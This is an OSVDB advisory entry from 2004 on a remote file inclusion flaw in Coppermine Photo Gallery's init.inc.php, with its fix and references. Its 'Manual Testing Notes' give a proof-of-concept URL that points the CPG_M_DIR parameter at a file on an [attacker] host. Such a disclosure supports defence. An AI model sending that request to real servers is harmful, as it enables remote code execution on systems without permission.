Coppermine Photo Gallery init.inc.php Remote File Inclusion

2004-04-29T00:00:00
ID OSVDB:5761
Type osvdb
Reporter Janek Vind "waraxe"(come2waraxe@yahoo.com)
Modified 2004-04-29T00:00:00

Description

Vulnerability Description

Coppermine Photo Gallery contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is triggered when sending a specially crafted URL request to the init.inc.php script using the CPG_M_DIR variable to specify a malicious file from a remote system as a parameter. It is possible that the flaw may allow arbitrary code execution resulting in a loss of integrity.

Solution Description

Upgrade to version 1.3beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Coppermine Photo Gallery contains a flaw that may allow a remote attacker to execute arbitrary code. The issue is triggered when sending a specially crafted URL request to the init.inc.php script using the CPG_M_DIR variable to specify a malicious file from a remote system as a parameter. It is possible that the flaw may allow arbitrary code execution resulting in a loss of integrity.

Manual Testing Notes

http://[victim]/nuke69j1/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://[attacker]/include/functions.inc.php

References:

Vendor URL: http://coppermine.sourceforge.net/ Vendor Specific Solution URL: http://nukephotogallery.com/index.php?name=Downloads&d_op=viewdownloaddetails&lid=39 Vendor Specific Advisory URL Security Tracker: 1010001 Secunia Advisory ID:11524 Related OSVDB ID: 5757 Related OSVDB ID: 5759 Related OSVDB ID: 6495 Related OSVDB ID: 6498 Related OSVDB ID: 6499 Related OSVDB ID: 5756 Related OSVDB ID: 6497 Related OSVDB ID: 6500 Related OSVDB ID: 5758 Related OSVDB ID: 5912 Related OSVDB ID: 6496 Other Advisory URL: http://www.waraxe.us/index.php?modname=sa&id=26 Keyword: waraxe-2004-SA#026 Keyword: Remote File Inclusion ISS X-Force ID: 16041 Bugtraq ID: 10253